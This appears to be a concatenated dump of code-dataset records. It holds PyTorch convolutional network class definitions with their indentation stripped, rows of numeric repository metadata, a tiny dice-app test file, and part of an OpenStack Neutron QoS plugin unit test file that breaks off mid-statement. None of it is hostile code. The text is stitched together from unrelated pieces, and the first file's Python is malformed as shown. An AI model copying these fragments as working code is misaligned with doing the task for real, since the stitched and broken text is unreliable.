                                   BaseN.conv3_2(8, 16),nn.ReLU(),
                                   # in_channels must match the 16 feature maps
                                   # produced by the previous conv layer
                                   BaseN.conv3_2(16, 8))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class ConvNetBias(BaseN.BaseNetwork):
name="ConvNetBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 12),BaseN.AdaptiveTanh(),
BaseN.conv3_2(12, 16),
BaseN.conv3_2(16, 20))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class FCConvNet(BaseN.BaseNetwork):
name="FCConvNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCConvNet,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus(),
BaseN.conv3_2(4, 8),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class FCConvNetBias(BaseN.BaseNetwork):
name="FCConvNetBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCConvNetBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.ReLU(),
BaseN.conv3_2(4, 4),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class ConvNet2(BaseN.BaseNetwork):
name="ConvNet2"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNet2,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 3),nn.Softplus(),
BaseN.conv3_2(3, 6),BaseN.conv3_2(6, 12))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
nn.Linear(512,1024),nn.Tanh(),
nn.Linear(1024,512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,256),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class ConvNetBig(BaseN.BaseNetwork):
name="ConvNetBig"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBig,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),nn.Softplus(),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
BaseN.EigenLayer(512,self.output_shape[0]))
self.compile()
class ConvNetBigBias(BaseN.BaseNetwork):
name="ConvNetBigBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus(),
BaseN.conv3_2(4, 4),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
BaseN.EigenLayer(512,self.output_shape[0],bias=False))
self.compile()
class ConvNetBigAtari(BaseN.BaseNetwork):
name="ConvNetBigAtari"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigAtari,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,512),nn.Tanh(),
nn.Linear(512,1024),
BaseN.EigenLayer(1024,self.output_shape[0]))
self.compile()
class ConvNetBigS(BaseN.BaseNetwork):
name="ConvNetBigS"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigS,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
nn.Linear(512,self.output_shape[0]))
self.compile()
class ConvNetMNIST(BaseN.BaseNetwork):
name = "ConvNetMNIST"
def __init__(self,input_shape,output_shape,**kwargs):
super(ConvNetMNIST,self).__init__(**kwargs)
self.n = output_shape
self.conv = [BaseN.ResNetBlock(1,32),
BaseN.conv3_2(32,64)]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0], nn.Softplus(),
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class ConvNetSimple(BaseN.BaseNetwork):
name="ConvNetSimple"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetSimple,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,self.output_shape[0]))
self.compile()
class FCNetSimple(BaseN.BaseNetwork):
name ="FCNetSimple"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNetSimple,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.Softplus(),
nn.Linear(1024,512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,self.output_shape[0]))
self.compile()
| 50.51626 | 91 | 0.508168 | 1,318 | 12,427 | 4.562974 | 0.056146 | 0.107915 | 0.082474 | 0.108247 | 0.801463 | 0.790489 | 0.758563 | 0.738111 | 0.731959 | 0.721317 | 0 | 0.058628 | 0.370001 | 12,427 | 245 | 92 | 50.722449 | 0.709541 | 0 | 0 | 0.582569 | 0 | 0 | 0.013841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073395 | false | 0 | 0.018349 | 0 | 0.238532 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
b9c5365f366487d350d0993e89760939da233546
| 80 |
py
|
Python
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 1 |
2020-12-03T14:27:20.000Z
|
2020-12-03T14:27:20.000Z
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 11 |
2020-10-21T17:51:12.000Z
|
2020-11-09T12:02:52.000Z
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 27 |
2021-09-09T22:53:21.000Z
|
2021-11-20T22:46:16.000Z
|
import unittest
import app
def test_test():
assert app.test() == "Works!"
| 11.428571 | 33 | 0.6625 | 11 | 80 | 4.727273 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 80 | 6 | 34 | 13.333333 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
b9ef242e4a5b9cd66209cacaae0f38bad7d2a39e
| 128,492 |
py
|
Python
|
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from keystoneauth1 import exceptions as ks_exc
import netaddr
from neutron_lib.api.definitions import qos
from neutron_lib.callbacks import events
from neutron_lib import constants as lib_constants
from neutron_lib import context
from neutron_lib import exceptions as lib_exc
from neutron_lib.exceptions import placement as pl_exc
from neutron_lib.exceptions import qos as qos_exc
from neutron_lib.objects import utils as obj_utils
from neutron_lib.plugins import constants as plugins_constants
from neutron_lib.plugins import directory
from neutron_lib.services.qos import constants as qos_consts
from neutron_lib.utils import net as net_utils
import os_resource_classes as orc
from oslo_config import cfg
from oslo_utils import uuidutils
import webob.exc
from neutron.exceptions import qos as neutron_qos_exc
from neutron.extensions import qos_pps_minimum_rule_alias
from neutron.extensions import qos_rules_alias
from neutron import manager
from neutron.objects import network as network_object
from neutron.objects import ports as ports_object
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.services.qos import qos_plugin
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.services.qos import base
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
SERVICE_PLUGIN_KLASS = 'neutron.services.qos.qos_plugin.QoSPlugin'
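# Tests for the QoS service plugin: policy and rule CRUD, driver call
# ordering, and the port resource_request extension used by Placement.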
class TestQosPlugin(base.BaseQosTestCase):
def setUp(self):
super(TestQosPlugin, self).setUp()
self.setup_coreplugin(load_plugins=False)
mock.patch('neutron.objects.db.api.create_object').start()
mock.patch('neutron.objects.db.api.update_object').start()
mock.patch('neutron.objects.db.api.delete_object').start()
mock.patch('neutron.objects.db.api.get_object').start()
_mock_qos_load_attr = mock.patch(
'neutron.objects.qos.policy.QosPolicy.obj_load_attr')
self.mock_qos_load_attr = _mock_qos_load_attr.start()
# We don't use real models as per mocks above. We also need to mock-out
# methods that work with real data types
mock.patch(
'neutron.objects.base.NeutronDbObject.modify_fields_from_db'
).start()
mock.patch.object(policy_object.QosPolicy, 'unset_default').start()
mock.patch.object(policy_object.QosPolicy, 'set_default').start()
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.admin_ctxt = context.get_admin_context()
self.policy_data = {
'policy': {'id': uuidutils.generate_uuid(),
'project_id': uuidutils.generate_uuid(),
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
self.rule_data = {
'bandwidth_limit_rule': {'id': uuidutils.generate_uuid(),
'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'id': uuidutils.generate_uuid(),
'dscp_mark': 16},
'minimum_bandwidth_rule': {
'id': uuidutils.generate_uuid(),
'min_kbps': 10},
'packet_rate_limit_rule': {
'id': uuidutils.generate_uuid(),
'max_kpps': 20,
'max_burst_kpps': 130},
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'any'},
}
self.policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
self.rule = rule_object.QosBandwidthLimitRule(
self.ctxt, **self.rule_data['bandwidth_limit_rule'])
self.dscp_rule = rule_object.QosDscpMarkingRule(
self.ctxt, **self.rule_data['dscp_marking_rule'])
self.min_bw_rule = rule_object.QosMinimumBandwidthRule(
self.ctxt, **self.rule_data['minimum_bandwidth_rule'])
self.pps_rule = rule_object.QosPacketRateLimitRule(
self.ctxt, **self.rule_data['packet_rate_limit_rule'])
self.min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **self.rule_data['minimum_packet_rate_rule'])
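    # Helper: assert that the driver manager was invoked with the expected
    # method name, context, and a QosPolicy payload.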
def _validate_driver_params(self, method_name, ctxt):
call_args = self.qos_plugin.driver_manager.call.call_args[0]
self.assertTrue(self.qos_plugin.driver_manager.call.called)
self.assertEqual(call_args[0], method_name)
self.assertEqual(call_args[1], ctxt)
self.assertIsInstance(call_args[2], policy_object.QosPolicy)
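    # Helper: build a port (optionally carrying a QoS policy) and run the
    # resource_request extension with network segments and minimum-bandwidth/
    # minimum-packet-rate rules mocked out.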
def _create_and_extend_port(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
has_qos_policy=True, has_net_qos_policy=False,
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
self.port_data = {
'port': {'id': uuidutils.generate_uuid(),
'network_id': network_id}
}
if has_qos_policy:
self.port_data['port']['qos_policy_id'] = self.policy.id
elif has_net_qos_policy:
self.port_data['port']['qos_network_policy_id'] = self.policy.id
self.port = ports_object.Port(
self.ctxt, **self.port_data['port'])
port_res = {"binding:vnic_type": "normal"}
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request(
port_res, self.port)
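    # Bulk variant of the helper above, exercising
    # _extend_port_resource_request_bulk over two port records.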
def _create_and_extend_ports(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
ports_res = [
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
]
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request_bulk(
ports_res, None)
def test__extend_port_resource_request_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_pps_rule(self):
port = self._create_and_extend_port([], [self.min_pps_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1']
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
port = self._create_and_extend_port(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_non_min_bw_or_min_pps_rule(self):
port = self._create_and_extend_port([], [])
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
physical_network=None)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_mix_rules_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
[self.min_pps_rule],
physical_network=None)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
ports = self._create_and_extend_ports([self.min_bw_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_pps_rule(self):
ports = self._create_and_extend_ports([], [self.min_pps_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1'] * 2
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
ports = self._create_and_extend_ports(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
for port in ports:
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_no_qos_policy(self):
port = self._create_and_extend_port([], physical_network='public',
has_qos_policy=False)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_inherited_policy(
self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_bw_rule.qos_policy_id = self.policy.id
port = self._create_and_extend_port([self.min_bw_rule],
has_net_qos_policy=True)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test_get_ports_with_policy(self):
network_ports = [
mock.MagicMock(qos_policy_id=None),
mock.MagicMock(qos_policy_id=uuidutils.generate_uuid()),
mock.MagicMock(qos_policy_id=None)
]
ports = [
mock.MagicMock(qos_policy_id=self.policy.id),
]
expected_network_ports = [
port for port in network_ports if port.qos_policy_id is None]
expected_ports = ports + expected_network_ports
with mock.patch(
'neutron.objects.ports.Port.get_objects',
side_effect=[network_ports, ports]
), mock.patch.object(
self.policy, "get_bound_networks"
), mock.patch.object(
self.policy, "get_bound_ports"
):
policy_ports = self.qos_plugin._get_ports_with_policy(
self.ctxt, self.policy)
self.assertEqual(
len(expected_ports), len(policy_ports))
for port in expected_ports:
self.assertIn(port, policy_ports)
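    # Parametrized helper: fire the precommit_update port callback and check
    # that policy validation only happens when the QoS policy id changes.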
def _test_validate_update_port_callback(self, policy_id=None,
original_policy_id=None):
port_id = uuidutils.generate_uuid()
kwargs = {
"port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock = mock.MagicMock(id=port_id, qos_policy_id=policy_id)
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_object',
return_value=port_mock
) as get_port, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_port"
) as validate_policy_for_port, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_port_callback(
"PORT", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['port'],
states=(kwargs['original_port'],)))
if policy_id is None or policy_id == original_policy_id:
get_port.assert_not_called()
get_policy.assert_not_called()
validate_policy_for_port.assert_not_called()
else:
get_port.assert_called_once_with(self.ctxt, id=port_id)
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
validate_policy_for_port.assert_called_once_with(
self.ctxt, policy_mock, port_mock)
def test_validate_update_port_callback_policy_changed(self):
self._test_validate_update_port_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_port_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_port_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_port_callback_policy_removed(self):
self._test_validate_update_port_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
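    # Same idea for networks: on a QoS policy change, only ports without a
    # policy of their own need re-validation.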
def _test_validate_update_network_callback(self, policy_id=None,
original_policy_id=None):
network_id = uuidutils.generate_uuid()
kwargs = {
"context": self.ctxt,
"network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock_with_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(),
qos_policy_id=uuidutils.generate_uuid())
port_mock_without_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(), qos_policy_id=None)
ports = [port_mock_with_own_policy, port_mock_without_own_policy]
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_objects',
return_value=ports
) as get_ports, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_network"
) as validate_policy_for_network, mock.patch.object(
self.qos_plugin, "validate_policy_for_ports"
) as validate_policy_for_ports, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_network_callback(
"NETWORK", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['network'],
states=(kwargs['original_network'],)))
if policy_id is None or policy_id == original_policy_id:
get_policy.assert_not_called()
validate_policy_for_network.assert_not_called()
get_ports.assert_not_called()
validate_policy_for_ports.assert_not_called()
else:
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
get_ports.assert_called_once_with(self.ctxt,
network_id=network_id)
validate_policy_for_ports.assert_called_once_with(
self.ctxt, policy_mock, [port_mock_without_own_policy])
def test_validate_update_network_callback_policy_changed(self):
self._test_validate_update_network_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_network_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_network_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_network_callback_policy_removed(self):
self._test_validate_update_network_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def test_validate_policy_for_port_rule_not_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=False
):
self.policy.rules = [self.rule]
self.assertRaises(
